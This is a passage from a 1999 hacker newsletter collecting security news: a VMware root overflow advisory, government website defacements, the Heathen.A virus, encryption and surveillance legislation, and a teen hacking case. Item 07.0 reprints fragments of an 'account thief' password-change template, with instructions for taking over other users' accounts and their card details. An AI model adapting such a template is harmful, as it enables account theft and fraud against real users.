       without repartitioning or formatting your hard drive.
       Vulnerability Summary
       Team Asylum has found multiple buffer overflows existing in VMware v1.0.1
       for Linux.  Earlier versions also have the same buffer overflows.
       VMware Inc. has been notified of these overflows and they have released
       VMware v1.0.2 as a fix.  Any local user can exploit these overflows to gain
       root access.
       All users are encouraged to upgrade to VMware v1.0.2.  You may download
       it directly off
       Special Thanks
       Special thanks to VMware staff for responding quickly to our bug reports.
       Within 3 days, they have managed to fix the overflows, as well as stop the
       physical distribution of their v1.0.1 product.  All customers who have
       purchased VMware have been notified as of 06/25/99 12:00 midnight (PST)
       about the new VMware v1.0.2 version.
 07.0 Security vulnerability in login template 
      Snarfed from PacketStorm Security:
        security vulnerability in which allows any user to 
       steal another users account and gain access to full access to 
       their account including cc# information
       no fix yet. has been informed.
       exploit template

Change My Password - ego's M0D1Fi3D verzi0n

Highlight the User ID: This is the hustler account thief script
in order for this to work you must know
somones real login name ( if its an old carded
account with a nick like XTC, give up
you cant steal a froozen account, but
yea.. u can change its password...
Enter Your New Password Enter Password again
@HWA 08.0 DOD investigating computer 'Mob-like' tactics ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: Federal Computer Week; JUNE 30, 1999 . . . 12:25 EDT DOD investigating computer 'mob tactics' BY DANIEL VERTON ( While a senior adviser to the Defense Department testified before Congress this week on threats to national security stemming from the export of powerful computer technology, his supervisor allegedly attempted to access and tamper with his computer, prompting the immediate launch of a full-scale investigation. Rep. Dan Burton (R-Ind.), chairman of the House Government Reform Committee, said Jay Davis, director of the Defense Threat Reduction Agency, informed the committee on June 28 that an investigation was under way into an incident involving unauthorized access to the computer belonging to a senior strategic trade adviser to the agency. According to Burton, the incident took place while Peter Leitner, a longtime internal critic of DOD's policy on exporting sensitive computer technologies, was testifying on June 24 before the committee regarding security problems stemming from that policy. Although no details from the investigation have been released yet, Burton claims that the incident is an example of DOD officials trying to strong-arm a congressional witness into not cooperating with the committee. "While Dr. Leitner was telling my committee about the retaliation he suffered for bringing his concerns to his superiors and Congress, his supervisor was trying to secretly access his computer," Burton said. "This smacks of mob tactics. Congress will not stand for this kind of witness intimidation." Although DTRA has launched an investigation into the incident, Burton said he plans to call upon Defense Secretary William Cohen to ask for "his personal involvement" in the case. "I intend to ask a lot of questions of the Defense Department officials involved, and I expect to get straight answers," Burton said. Leitner has criticized the department's policy of easing export controls on powerful computer technology that is used to simulate and test the reliability of nuclear weapons, claiming that the acquisition of supercomputer technology abroad was feeding a new form of Cold War characterized by an arms race for "virtual weapons." @HWA 09.0 GSA announces Intrusion Detection Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: Federal Computer Week; JUNE 28, 1999 GSA launches intrusion-detection net BY DIANE FRANK ( The General Services Administration last week asked industry for information about emerging security technology for detecting unauthorized users on agency networks, with the goal of building a government intrusion-detection system by the end of next year. In building the Federal Intrusion Detection Network (Fidnet), GSA hopes to find security tools vendors are developing that overcome the weaknesses of existing technology. By keeping ahead of the latest technology, GSA hopes to leave agency defenses less vulnerable to hackers, agency officials said. "We want to encourage people to develop new technologies that will help us keep neck and neck with the perpetrator," said David Jarrell, program manager for the GSA portion of Fidnet in the Federal Technology Service's Office of Information Security and technical director of the Federal Computer Incident Response Capability. OIS will look not only to established intrusion-detection vendors but to new companies and people that "we haven't even heard of," Jarrell said. "I think there are people out there that are significantly brilliant enough to solve this and we hope that this [request for information] will cause them to come forward," he said. GSA plans to use the vendor-provided information to develop prototypes by the first quarter of fiscal 2000, said Tom Burke, GSA's assistant commissioner of information security. Down the line, OIS may even pay some of the vendors to put together a long-term, real-world demonstration of their capabilities at an agency, he said. GSA particularly is interested in finding intrusion-detection systems that are more capable of detecting attacks as they happen instead of after the fact. The problem is that most intrusion-detection solutions work the same way anti-virus protection does: They check network-use patterns against a known list of intrusion "signatures" and send out alerts when they come across a match. But as vendors and users have known for years, this method will not catch intrusions that are not on that list. Also, most products just now are advancing to the point where they alert administrators at the time an intrusion takes place. "We find that many of the off-the-shelf products that are available today are really a response to the intrusions, and they are always a step behind the intruder," Jarrell said. "We want to look to the future and some artificial intelligence that will learn as it goes about the attacks that are being launched." This type of capability would be more than welcome to agencies, especially if they are enabled to respond more quickly at the local level, said one senior civilian agency official. Others recognized the potential benefits of sharing attack "experience" across government. "What I would hope this next-generation intrusion detection could bring to us is the capability not only to monitor [intrusions] but to put together the information in a history for reference," said Sarah Jane League, Defense Department liaison at the Critical Infrastructure Assurance Office. "It should bring that pattern recognition and learn as it that over time it will have the ability to recognize" not only attacks but what could be attacks, she said. Vendors have been working on this type of product, sometimes called anomaly detection, for some time. "ISS has a lot of research efforts in place to advance the intrusion-detection market," said Mark Wood, intrusion-detection product manager at Internet Security Systems Inc., maker of the Real-Secure intrusion-detection product line. "Having a pre-defined list of signatures is nice, but you'd like to detect novel attacks, things you don't know about." One major problem vendors are struggling with in producing this type of solution is the large number of "false positives" -- incorrectly perceived attacks -- that are generated when a network is scanned, Wood said. Despite this, a commercially viable solution could be available within the next year, he said. "It's certainly worthwhile that someone like the GSA is driving this; it's absolutely necessary," Wood said. "Perhaps this will help coordinate the industry so that they will provide something sooner than they would have." The need for this type of solution across government has been underscored by the more than 40 federal World Wide Web sites that have been hacked in the last two months, including at least six last week. And these attacks are only the most noticeable types of intrusions into government networks, according to federal experts testifying before Congress last week [see related story, "House member suggests regular network security reports"]. However, in the end, while many would wish otherwise, keeping up with attackers instead of one step behind really is the best that anyone can do, Jarrell said. "There is no silver bullet; there is no perfect solution when it comes to intrusion detection," he said. "As I've said before, if you build a better mousetrap, a better mouse will evolve." @HWA 10.0 Nasa servers reportedly hacked ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From 30 Jun 1999, 10:51 AM CST By David McGuire, Newsbytes. MINNEAPOLIS, MINNESOTA, U.S.A., . In what appears to be the third computer attack on a government Website this week, crackers may have gained unauthorized access to one or more National Aeronautics and Space Administration (NASA) servers yesterday. "There is some indication that a couple servers at the Marshal Space Flight Center in Huntsville, Alabama" were attacked earlier this week, a NASA spokesperson told Newsbytes today. NASA could not confirm the reports as of this writing. The Marshall site was up and running as of 11:00 EDT today. While Sunday's hack of the US Army's home page typifies the kind of high-profile attack favored by many hacker (more accurately known as cracker) groups, the apparent Marshal attack and yesterday's crack of National Oceanic and Atmospheric Administration's (NOAA) Norman, Okla.-based Storm Prediction Center are more puzzling, Newsbytes notes. Marshall is a fairly low-profile NASA center that focuses primarily on research in the areas of astronomy, low gravity, and space shuttle propulsion. The Storm Prediction Center (SPC) provides nationwide weather forecasts. The SPC hack caught NOAA by surprise. "At about three AM, some Internet customer called one of our forecasters and said 'You better check your Website,'" SPC Director Joe Schaefer told Newsbytes yesterday. "We produce weather forecasts for the whole country," he said. "We are doing a public good. There is no way I can see that we are harming anybody. To come after a site like this is strange, to put it mildly." The Army hack was somewhat more typical. At some point Sunday night, crackers replaced the Army's home page with a page that read "Hello, this Website hack has a purpose. The purpose is to settle rumors. Global Hell is alive, Global Hell will not die," Lt. Col. Ron Burns of the Army's Director for Information Systems Command, Control, Communications and Computers (DISC4) unit told Newsbytes Monday. Sunday's attack was the first successful crack of the Army's main site, located at . The US Senate and Federal Bureau of Investigation (FBI) have also suffered recent Website attacks. The FBI declined comment on the string of hacker attacks. Reported by, . 10:51 CST Reposted 10:59 CST @HWA 11.0 UK May Force ISPs to Install Taps ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 28th From HNN contributed by Weld Pond The British Interception of Communications Act has been the target of proposed changes recently. The changes would require all communications service providers to build in, at their expense, capabilities for government agents to be able to listen in to communications. This proposal is particularly broad as it does not stop at the internet and covers everything from pagers to video conferencing to VPNs. Theses new requirements have been proposed by the International Law Enforcement Telecommunications Seminar (ILETS)an exclusive FBI funded group that meets in secret. Tech Web U.K. Wants ISPs To Build In Interception (06/25/99, 3:40 p.m. ET) By Duncan Campbell, TechWeb The British government has become the first in Europe to openly propose internationally agreed requirements for ISPs to build technology into networks that would allow for police surveillance. Under proposals for changes to the Interception of Communications Act announced by the Home Office this week, all communications service providers (CSPs) would be required to build interception software or hardware into their systems. The law -- if passed -- will apply to all types of new communications services, including Internet telephony, TV conferencing, paging, and satellite based personal communications systems. The International User Requirements have been drawn up over the past six years by a group founded by the U.S. FBI, called the International Law Enforcement Telecommunications Seminar (ILETS), which meets in secret. The group excludes representatives from industry or civil rights organizations, and has attempted to standardize its objectives as an International Telecommunication Union requirement. According to this week's "white paper," every type of network will be covered, including VPNsoperated through the Internet or other TCP/IP systems. The new law will also cover interception of business telecom services, ranging from basic networks of a few lines found within a small office to large networks linking offices, in both the public and private sectors, the document says. Under the present British Interception of Communications Act, only licensed public telecom operators have to provide government tapping facilities within their networks. However, ISPs must surrender any stored communications data they have, including e-mail, Web-access records, and service details, if served with an order. Home Secretary Jack Straw now proposes all CSPs be required to take reasonable steps to ensure their system is capable of being intercepted. "This will be an ongoing requirement CSPs will have to consider each time they develop their network or introduce new services," Straw said. "CSPs will also be required to provide reasonable assistance to effect warranted intercepts." This will include real-time access to data about their subscribers and information about services they have used, including logs of telephone calls, e-mail, or website accesses. A key part of technical arrangements to be made will ensure operators will not be able to know what information has been copied from their systems. The British government said the new law would make full provision for human-rights legislation, Straw said. But according to Madeleine Colvin of Justice, the international human-rights organization and British section of the International Commission of Jurists, the proposed law would not achieve this. "There are major gaps in what these proposals suggest for controlling surveillance methods. For example, how is anyone to know if their human rights may have been abused if they are never going to be told that their e-mail has been intercepted by the government?" he asked. @HWA 12.0 Crypto Tie Downs Loosened ~~~~~~~~~~~~~~~~~~~~~~~~~ June 28th From HNN contributed by mortel Bills to loosen the restrictions on exporting strong encryption were approved on Thursday by the U.S. Senate and House Commerce Committees. The House Security and Freedom through Encryption (SAFE) Act removes the government restrictions on export of strong encryption if a comparable encryption product is commercially available outside the U.S. In addition, the SAFE Act bars the government from requiring key recovery. Yeah! CNN U.S. committees approve encryption bill by Elinor Mills Abreu From... (IDG) -- The U.S. Senate and House Commerce Committees Thursday approved bills that would liberalize encryption export regulations. In addition, the Senate committee passed bills calling for the promotion of digital signatures and filtering software to block pornography. The House Security and Freedom through Encryption (SAFE) Act removes the government restrictions on export of strong encryption if a comparable encryption product is commercially available outside the U.S. In addition, the SAFE Act bars the government from requiring key recovery, whereby the government would have access to keys to decode encrypted messages for law-enforcement purposes. The government argues that it needs to control the export of strong encryption for national security. Vendors argue that the restrictions hamper their competitiveness on the worldwide market because strong encryption is readily available outside the U.S. The government wants vendors to develop encryption software that includes a key recovery mechanism. The amendments approved by the House committee would do several things: require that a comparable encryption product be available in a country outside the U.S. in order for a U.S. company to export similar technology there; bar export to the People's Liberation Army or the Communist Military in China; allow the Secretary of Commerce to deny the export of encryption products if they would be used to harm national security, to sexually exploit children or to execute other illegal activities; require the Secretary of Commerce to consult with the secretaries of State and Defense, the Director of Central Intelligence and the Attorney General when reviewing a product; and subject a person to criminal penalties for not providing access to encrypted data if a subpoena were served and the person had the capability to decrypt the data. Meanwhile, Sen. John McCain [R-Ariz.] proposed a Senate encryption bill that would allow for the exportation of encryption of key lengths up to 64 bits. In general, companies currently must get a license to export encryption higher than 56 bits in key length. In addition, the McCain encryption bill would allow for the export of stronger "nondefense" encryption to "responsible entities" and governments in the North Atlantic Treaty Organization, the Association of Southeast Asian Nations and the Organization for Economic Cooperation and Development. However, the Secretary of Commerce would be allowed to prohibit export of particular encryption products to an individual or organization in a foreign country. An Encryption Export Advisory Board would be created to review applications for exemption of encryption of over 64 bits, make recommendations to the Secretary of Commerce and authorize more funding to law enforcement and national security agencies to "upgrade facilities and intelligence." The bill would ask the National Institute of Standards and Technology to establish an advanced encryption standard by Jan. 1, 2002. "The bill carefully balances our national security and law enforcement interests while updating current laws on encryption technology," McCain said in a statement. "It is illogical to deny U.S. producers the ability to compete globally if similar products are already being offered by foreign companies." On the digital signature front, Sen. Spencer Abraham [R-Mich.] said the Millennium Digital Commerce Act he sponsored would "ensure that individuals and organizations in different states are held to their agreements and obligations even if their respective states have different rules concerning electronically signed documents." The Abraham bill would pre-empt state law from denying that digital contracts are legal solely because they are in electronic form; establish guidelines for international use of electronic signatures that would remove obstacles to electronic transactions; and allow the market to determine the type of authentication technology used in international commerce. The Senate Commerce Committee also grappled with Internet censorship by approving another McCain-sponsored bill. The plan would require schools and libraries receiving government universal service discounts for Internet access to use filtering technology on computers children access that would screen out pornography. Taking up a less controversial bill, the Senate committee also approved a measure to tie cellular phone users calling 911 to medical centers, police and firefighters for faster response time to accidents and emergencies. The bill would expand the coverage areas of wireless telephone service; establish parity of protection for the provision or use of wireless 911 service; and upgrade 911 systems so they can provide information such as location and automatic crash notification data. Alan Davidson, staff counsel for the Washington, D.C.-based Center for Democracy and Technology, said "it was a mixed day for the Internet on Capital Hill." While legislators realize the potential of electronic commerce and favor liberalizing encryption export to advance it, they are fearful of what they see as the "dark side" of the Internet - content that might be objectionable, according to Davidson. Rather than require filtering software in schools and libraries, legislators should offer educational institutions the flexibility to choose "acceptable use or monitoring policies," he said. "Mandating that every school and library filter access to the Internet is not going to be the best way to protect kids," he said. "In addition to the fact that the bill has constitutional problems, it mandates one technological approach without regard to the more effective ways that local communities are already protecting kids." Other committees may review these bills before they go to the floor of the two houses for a vote, he said. @HWA 13.0 Heathen.A Spreads Through Word Files ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 28th From HNN contributed by nvirb While not intentionally malicious or as fast spread as Melissa or WormExplorer Heathen.A is latest threat to computer users. Heathen.A is considered to be a multipartite virus and only infects only Word97 files. PC World"/article/0,1510,11586,00.html Heathen.A Is at the Gates Keep a lookout: There's a new bug in town. by Matthew Nelson, InfoWorld Electric June 25, 1999, 4:50 p.m. PT SAN MATEO, CALIFORNIA -- Network Associates' Anti-Virus Emergency Response Team is warning users about what it terms a "medium risk" virus called Heathen.A. Heathen.A is a multipartite virus, as it uses two classes of files, an .exe portion and a .doc portion, for its infection. The virus was originally spread from a newsgroup and replicates itself across Microsoft Word 97 files, but it does not destroy data. "It's delivered if someone receives an e-mail with an infected Word 97 document, or if they access any server file that is infected," says Allison Taylor, product marketing manager for corporate antivirus solutions at Network Associates. "It doesn't carry a particular payload except for dropping a patch into your [Windows] 95/98 shell." "It runs a modified version of your Windows Explorer system and then infects the Word 97 documents," Taylor explains. "So once you've been infected, any Word 97 file that you open from then on will also be infected." The macro drops three system files, heathen.vex, heathen.vdl, and heathen.vdo, into a system's C:/Windows subdirectory. When the system is rebooted, the heathen.vex file is renamed explorer.exe, according to AVERT Labs. NAI has assigned the Heathen.A virus a medium-risk level as it is not engineered to appear to be coming from a known user, and because it infects new systems only if a user opens an infected Word 97 file. Heathen.A does not send itself through e-mail as Melissa and Worm.ExploreZip do. NAI has issued a virus update to protect against the Heathen.A virus at AVERT Labs' Web site. @HWA 14.0 $950 for a Log File Analysis Tool ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 28th From HNN contributed by Weld Pond Sandstorm Enterprises has introduced what they are calling a TCP/IP Session Reassembler named TCP.demux. According to the press release it doesn't seem to be more than a glorified grep script. Maybe it is actually useful but $950 seems a little steep. Excite News Sandstorm Enterprises Sandstorm Enterprises Introduces TCP.demux, a TCP/IP Session Reassembler; New, Efficient Tool for Network-Based Investigations, Auditing, and Reverse Engineering Click on our sponsors! Updated 1:34 PM ET June 23, 1999 BOSTON (BUSINESS WIRE) - Sandstorm Enterprises Inc., an information security tools company, has released the first version of TCP.demux, a TCP/IP session reconstruction utility. TCP.demux is the first of a set of tools from Sandstorm Enterprises for advanced network monitoring and surveillance. TCP.demux is designed to make network monitors, such as "tcpdump", "snoop", and "Sniffer Basic" more useful. There are so many connections over even a medium-sized network that it is often impossible for even a high-end commercial network analyzer to present the traffic in a clear, informative way. TCP.demux takes IP streams captured by network monitors, reassembles them into their constituent TCP/IP and UDP sessions, and displays the information in a variety of convenient formats. TCP.demux includes sophisticated and powerful analysis tools for quick identification of relevant sessions. Possible uses of TCP.demux include network security, reverse engineering, and network-based software development. It can be used to create profiles of suspicious users and to find information being sent unencrypted over a network. It can also help point out weaknesses and vulnerabilities in network applications and design. TCP.demux detects and flags anomalies that may be designed to interfere with network monitoring. TCP.demux generates reports in 19 different text or HTML formats. It runs on a wide variety of platforms, including Windows 95/98/2000/NT and many varieties of UNIX, including RedHat Linux 5.1, NetBSD, OpenBSD, FreeBSD, BSDI, and Solaris. TCP.demux can easily be included in batch files, shell scripts, and other applications in any computer language. The idea of a TCP session reconstruction tool is not new, but all other such tools have been platform-specific and embedded in ponderous application suites. "There have been many tools for winnowing through Internet traffic flows, but almost everything to date has been scaled or developed for the workgroup environment," says James VanBokkelen, Sandstorm's President and founder. "The Internet has grown enormously in the past few years, and with it the scale of the problems. TCP.demux is the first tool we know of designed with the scope of today's problems in mind." Analyzing network traffic with TCP.demux is time-efficient, and therefore cost-efficient. Because dumpfile analysis is separated from the capture process, TCP.demux allows remote monitoring of networks. An engineer at one of Sandstorm's beta sites said, after TCP.demux had allowed him to isolate problems on a large congested network in under half an hour, "TCP.demux was the quickest way to debug the system. Had the debugging process been long, it would have jeopardized our ability to ship on time." TCP.demux is being offered at the introductory price of $950. Additional information on TCP.demux can be found at Sandstorm Enterprises, headquartered in Boston, MA, has been acclaimed for its groundbreaking PhoneSweep telephone scanner, the first commercial product designed to audit corporate telephone networks for vulnerability to attacks by hackers. See Sandstorm Enterprises at the USENIX Security Conference in Washington, D.C. August 25-26. Sandstorm personnel collectively have decades of experience in security management, software development, research, education, and consulting. Sandstorm is committed to providing trusted, reliable products and excellent technical support. Sandstorm Enterprises is on the web at PhoneSweep and TCP.demux are trademarks of Sandstorm Enterprises, Inc. Contact: Sandstorm Enterprises, Inc. James Van Bokkelen (617) 426-5056 or In Washington, DC: Ross Stapleton-Gray or @HWA 15.0 Youth Charged With $20,000 in Damages ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 28th From HNN contributed by Richard223 The case of a minor from Chesterfield County Mass, made it into a newspaper in Virginia. The youth has been charged with breaking into ACIS/BICNet, according to court documents he caused "the entire system to crash" which resulted in over $20,000 in damage. Evidently the Virginia High Technology Crimes Unit was the investigating office since the suspect used one Virginia system to route his traffic. Richmond Times Dispatch Chesterfield youth pleads guilty to hacking Friday, June 25, 1999 BY MARK BOWES Times-Dispatch Staff Writer A Chesterfield County youth who authorities said is intelligent but committed a foolish act has pleaded guilty to hacking into a Massachusetts Internet provider's system, disabling it and causing at least $20,000 in damage. The 16-year-old, whose identity is being withheld because of his age, pleaded guilty to computer trespassing Monday in Chesterfield Juvenile and Domestic Relations District Court. The judge continued the matter until Aug. 12 so he can decide whether to convict the boy of a felony, as charged, or reduce it to a misdemeanor. Through his attorney, the boy agreed the evidence was sufficient to convict him, "but contested whether or not it was maliciously done," which is required for a felony conviction, said Assistant Chesterfield Commonwealth's Attorney Aubrey M. Davis Jr. "I didn't see it as [a malicious] act," Davis said. "I think it was a foolish act by an intelligent kid who didn't really realize the significance of what he was doing. He's a pretty daggone smart kid." Virginia State Police Special Agent Sal Girgente, who investigated the case here, gave a summary of evidence in court on Monday. According to evidence, the boy, using his mother's Internet account, hacked into the computer network of ACIS/BICNet, an Internet service provider in Ayer, Mass., in August. State police also believe he succeeded in breaking into the computer systems of New Mexico State University and Aurora Communications Exchange Ltd., in Ontario, Canada. Investigators believe he may have hacked into the latter two systems to "cover his tracks" before breaking into the Internet provider's network. The state police's new High Technology Crimes Unit began investigating the case after getting a referral from the FBI's Boston field office. An agent there succeeded in tracking an intruder into the ACIS/ BICNet system back through a Virginia Internet provider to the boy's home in Chester. During an intrusion on Aug. 8, police believe the teen and possibly accomplices replaced system files, among other things, created a new account and turned off system logging, according to court documents. That caused the company's e-mail system to be out of service for 12 hours. Several days later, the intruder again broke into the system and succeeded in causing "the entire system to crash," court papers say. The resulting damage, police said, topped $20,000. The teen "succeeded in bringing the system to its knees," Girgente said. Three FBI traces were successful in leading authorities to the Chesterfield family's Internet account. Police believe the boy and other hackers broke into the system to play games or create chat rooms. 1999, Richmond Newspapers Inc. @HWA 16.0 Army Fights Online Battle And Looses ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 29th From HNN contributed by Space Rogue Early Monday morning one of the the four web servers for the US Army came under attack. The web page poked at the FBI and their recent raids of the members of the group gH. was quickly noticed as being defaced and was restored by 6am. It is believed that the attackers used a highly publicized exploit for Cold Fusion, an exploit for which a patch has been available for weeks.(Hmmmmm, maybe I should reenlist and help them out?) HNN Cracked Pages Archive - Be sure to read the html comments. CNN San Jose Mecury News APB Online MSNBC Nando Times,1634,65142-103297-733898-0,00.html ZD Net,4586,2285307,00.html CNN; Hackers attack Army's main Internet site June 28, 1999 Web posted at: 7:37 PM EDT (2337 GMT) WASHINGTON (AP) -- Computer hackers defaced the Army's main Web site in the latest digital attack on a federal system. Pentagon workers noticed it early Monday and repaired it. Army spokesman Jim Stueve said administrators believe hackers altered the site between 8 p.m. Sunday and 5 a.m. Monday, but no internal systems were affected. "There were no security breaches," he said. The altered site announced the attack "has a purpose ... to settle rumors" about the demise of the loosely organized hacker group that claimed responsibility for the May attack on the White House Web site. Another message hidden within the altered page's computer code urged people who saw it to "trust very few people." Stueve said he noticed the defaced page when he arrived for work Monday morning. It was replaced by 6 a.m. "I just looked at it and just went on to my favorites (other sites) and blew it off because I knew they were going to get to it right away," he said. The attack comes in the wake of several others on prominent government Internet sites, including those of the White House, FBI and Senate. Military pages have long been favorites of hackers. "They're always the target," said Keith Rhodes, a director in the information management division in the General Accounting Office, the investigative branch of Congress. "It's almost like a rite of passage. You have to bust a (military) site to have any credibility." Just last week, experts told the House Science Committee's technology panel that managers at many federal agencies fail to consider computer security adequately and have too few employees with sufficient training. Rhodes, who was among those testifying last week, said Monday that the Defense Department's computer-security expertise is uneven. "They're the best and the worst in computer security," Rhodes said. "They've got some real pros, some of the best in the business. But the DOD is huge ... and some of the areas in the Department of Defense don't have very good security." Outside security experts said they believed the Army site's attackers used a relatively well publicized security loophole in the popular Cold Fusion software package. The Army said only that the incident was under investigation. "The community of attackers is getting better at what they do, and a lot of their tools are getting automated," Rhodes said. "And a lot of the software being sent out is getting worse -- designed for flash with security as an afterthought. You put up your Web site, and its gets creamed." @HWA 17.0 Welfare Reform Law Invades Privacy of US Citizens ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 29th From HNN contributed by Weld Pond The Personal Responsibility and Work Opportunity Reconciliation Act of 1996 was primarily passed to reform the welfare system in the United States. One of the little known provisions of this law is that employers must report all new hires and salary changes to the government on a quarterly basis, this information eventually makes its way to the Administration for Children and Families. Starting next month the program will require banks to search for accounts on people determined to be delinquent on their child-support payments. (Ed Note: This is an eye opening article and is recommended. It is long and the good stuff is at the bottom.) The Charlotte Observer Posted at 7:45 p.m. EDT Saturday, June 26, 1999 Huge new electronic `dragnet' assailed by privacy advocates By ROBERT O'HARROW JR. The Washington Post WASHINGTON -- As part of a new and aggressive effort to track down parents who owe child support, the federal government has created a vast computerized data-monitoring system that includes all individuals with new jobs and the names, addresses, Social Security numbers and wages of nearly every working adult in the United States. Government agencies have long gathered personal information for specific reasons, such as collecting taxes. But never before have federal officials had the legal authority and technological ability to locate so many Americans found to be delinquent parents -- or such potential to keep tabs on Americans accused of nothing. The system was established under a little-known part of the law overhauling welfare three years ago. It calls for all employers to quickly file reports on every person they hire and, quarterly, the wages of every worker. States regularly must report all people seeking unemployment benefits and all child-support cases. Starting next month, the system will reach further. Large banks and other financial institutions will be obligated to search for data about delinquent parents by name on behalf of the government, providing authorities with details about bank accounts, money-market mutual funds and other holdings of those parents. State officials, meanwhile, have sharply expanded the use of Social Security numbers. Congress ordered the officials to obtain the nine-digit numbers when issuing licenses -- such as drivers', doctors' and outdoorsmen's -- in order to revoke the licenses of delinquents. Enforcement officials say the coupling of computer technology with details about individuals' employment and financial holdings will give them an unparalleled ability to identify and locate parents who owe child support and, when necessary, withhold money from their paychecks or freeze their financial assets. ``They never get away from us anymore. It's just wonderful. . . . What you're trying to do in child support is build a box, four walls, around a person,'' said Brian Shea, the acting executive director of child-support enforcement in Maryland. ``It has in some ways revolutionized this business.'' But privacy experts and civil libertarians say the scope of the effort raises new questions about the proper line between aggressive public policy and intrusive government snooping. In pursuing an objective that is almost universally applauded, the government has also created something that many Americans have staunchly opposed: a vast pool of fresh personal information that could be used in a variety of ways to monitor their lives. ``What you have here is a compilation of information that is much better and more current than any other data system in the U.S.,'' said Robert Gellman, an attorney and privacy specialist in Washington, D.C. ``All of the sudden we're on the verge of creating the Holy Grail of data collection, a central file on every American.'' Already lawmakers, federal agencies and the White House have considered expanding the permitted aims of the system to include pinpointing debtors, such as students who default on government loans. Under the system, every employer must send information about new hires and quarterly wages to state child-support agencies. State officials gather the data, along with information on unemployment benefits and child-support cases, and then ship it to computers run by the Administration for Children and Families. ACF officials then use computers to sort and send back to state authorities reports about people obligated to pay child support. Government officials say the system is safe, accurate and discreet. They also say it is secure. Because it has, among other safeguards, systems that confirm the accuracy of Social Security numbers, officials say it will not intrude into the lives of most people. An examination of the program, however, shows that government officials have downplayed or overlooked a variety of privacy and security concerns as they worked to meet congressional deadlines. The computer system that houses much of the data at the Social Security Administration ``has known weaknesses in the security of its information systems,'' according to a Dec. 31 report by the General Accounting Office. And authorities have not studied the frequency of mistakes that might arise from incorrect data, even though the system will enable local child-support enforcement officials to routinely freeze a parent's assets without an additional court hearing. Few people know about the system, even though it was created through one of the signature acts of Congress and the Clinton administration -- the ``Personal Responsibility and Work Opportunity Reconciliation Act of 1996,'' the law that ended the federal guarantee of welfare payments. Much of the congressional debate and news coverage at the time focused on the broad policy and political implications of the new law. Officials have not publicized their ability to obtain financial information because they do not want to alert delinquents to the ability of enforcement workers to seize or freeze financial assets, according to Michael Kharfen, spokesman for the federal Administration for Children and Families, which administers the program. -0- When welfare reformers on Capitol Hill and the White House approved the system in 1996, their aim was to cut down welfare spending by boosting child-support payments. (Begin Optional Trim) They had in mind people such as Stephanie Dudley and her son, Robert, who live in Farmington, Minn. Robert's father had split up with Dudley shortly after the boy was born and drifted from place to place. He owed $350 a month in child-support payments, but it was hard tracking him down and getting him to pay. Officials found Robert's father -- and then started withholding money from his paycheck -- after a new employer in Pennsylvania reported him to the network. ``I literally was living from check to check,'' Dudley said. ``I mean, that money literally put shoes on the kids' feet, helped pay the rent.'' Kathy Robins of Tazewell, Va., and her 7-year-old son, Dwight, never received court-ordered child support until the system turned up his father in North Carolina. Now she gets about $120 a month, money she plans to use to pay for a babysitter this summer. ``It'll help,'' she said. ``I mean, it's better than I was getting before, which was nothing.'' Child-support advocates contend that fears about privacy are overblown when weighed against such successes. (End Optional Trim) As of 1997, the latest year for which figures available, more than 7.4 million delinquents owed more than $43 billion in past child support. The system has helped boost support payments from $12 billion in 1996 to $14.4 billion last year, officials said. And in 1997, the burgeoning system helped enforcement programs locate more than 1.2 million delinquents. The system is essentially an electronic dragnet. It collects the names, Social Security numbers and other data about every newly hired employee in the nation from employers, who also must provide pay reports for most wage-earning adults. States ship along the names and other identifying information of people who receive state unemployment insurance. The Administration for Children and Families, a part of the Department of Health and Human Services, serves as a sort of clearinghouse that automatically matches all of that information against a file of nearly 12 million child support cases to locate parents obligated to pay support. Then the agency provides information about those parents -- no matter whether they are behind on payments -- to the appropriate state enforcement workers. The idea is to track the parents across state lines. Supporters of the system note that Congress explicitly restricted access to it. Those authorized to use the information include the Social Security Administration, which can use the directory of new hires to verify unemployment reports; the Treasury Department, which can use it to cross-reference tax-deduction claims; and researchers, who gain access only to anonymous data. Next month, financial institutions that operate in multiple states will begin comparing a list of more than 3 million known delinquents against their customer accounts. Under federal law, the institutions are obligated to return the names, Social Security numbers and account details of delinquents they turn up. The Administration for Children and Families will then forward that financial information to the appropriate states. For security reasons, Kharfen said, the agency will not mix the financial data with information about new hires, wages and the like. Bank account information will be deleted after 90 days. In a test run this spring, Wells Fargo identified 72,000 customers whom states have identified as delinquents. NationsBank found 74,000 alleged delinquents in its test. (Begin Optional Trim) Civil liberties activists say it would be a mistake to consider the system solely in terms of finding bad parents and making them pay up. They worry that the network sets a new standard for data surveillance by using computers to cross-reference hundreds of millions of personal records about Americans. Over the past quarter-century, since the Privacy Act was enacted in 1974, the federal government has tried to place limits on how its officials could compare databases to find or profile people. And in general, the government was supposed to limit data collection about people who paid taxes, received a federal benefit, served in the military or tangled with the judicial system. Critics say this new effort leaps beyond those practices by systematically creating centralized files about workers, wages and families, and sifting through those files to find a relatively small number of suspected deadbeats. The new registry of child-support cases, for example, now requires the names of all parents and children involved, even if they do not receive public assistance or ask for help in getting a problem resolved. The registry has information about nearly 12 million families. There is also concern about the government's reliance on private employers and financial institutions to watch citizens. A proposal last year to require banks to routinely track customer transactions for signs of criminal activity prompted an outpouring of protest. Regulators ditched the plan, called Know Your Customer, this spring after acknowledging they had misstepped. Taylor Burke, vice president of Burke & Herbert Bank & Trust Co. in Alexandria, Va., said he doesn't believe banks should be asked to watch their customers so closely on behalf of the government. ``We're all good citizens. But it doesn't mean we spy on our neighbors,'' Burke said. ``It's really scary.'' A review of the swift development of the system has turned up still other questions about whether the government paid enough attention to privacy -- particularly at a time when the issue has become a flash point in public policy debates across the country. As the system was phased in, officials posted federally required notices only in the Federal Register. No additional information has been added to W-4 forms that people must fill out when taking a new job. In addition to the issues raised by the GAO about the security of computer systems gathering and transmitting personal information, the systems in about a dozen states also have not been certified by federal officials as meeting security and privacy guidelines. Officials in OMB and the Administration for Children and Families sought to allay fears about mistakes. While acknowledging they have no idea about the likely rate of errors because no study was conducted, officials said the program verifies the accuracy of any Social Security numbers before 